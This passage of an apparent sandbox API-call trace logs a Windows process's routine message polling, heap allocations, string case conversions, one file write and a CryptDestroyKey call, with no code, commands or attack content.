wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.170] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0157.170] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.170] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0157.170] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.170] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0157.170] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.170] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0157.170] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0157.170] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.171] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.171] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.171] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.171] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.171] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0157.171] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.171] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0157.171] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0157.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.171] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.171] WriteFile (in: hFile=0x4b0, lpBuffer=0x2a72718*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2a72718*, lpNumberOfBytesWritten=0x8cf5e4*=0x8, lpOverlapped=0x0) returned 1 [0157.172] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa6f0 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0157.172] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72648 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71a0 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6c0 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa750 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa810 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa6f0 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa540 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa558 [0157.172] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa7f8 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78430 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a726a8 [0157.173] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa570 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a726a8 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa858 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa900 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72718 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaab28 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72648 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa68 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0157.173] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0157.173] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0157.173] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.173] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.173] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72718 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa990 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72738 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781d8 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8d0 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaaf8 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9d8 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa38 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0157.174] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aaa9c0 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0157.174] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b28 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0157.174] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0157.174] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e940 [0157.175] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0157.175] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b08 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa98 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa960 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa50 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72778 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa948 [0157.175] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a728f8 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72aa8 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a08 [0157.175] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0157.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa978 [0157.176] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aaa978, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b08 [0157.176] CryptDestroyKey (hKey=0x9e21f8) returned 1 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75160 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72aa8 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b58 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa888 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaab0 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8a0 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9f0 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa20 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a38 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a75380 [0157.176] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0157.176] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783b8 [0157.176] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72748 [0157.176] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0157.177] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa80 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa870 [0157.177] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0157.177] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.177] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.177] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0157.177] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaae0 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0157.177] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0157.177] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.177] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa840 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaac8 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.177] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0157.177] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.177] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72748 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72698 [0157.178] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0157.178] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa9a8 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaa08 [0157.178] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0157.178] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0157.178] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72698 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72778 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa8e8 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa918 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a728f8 [0157.178] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa930 [0157.178] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.178] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0157.178] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, 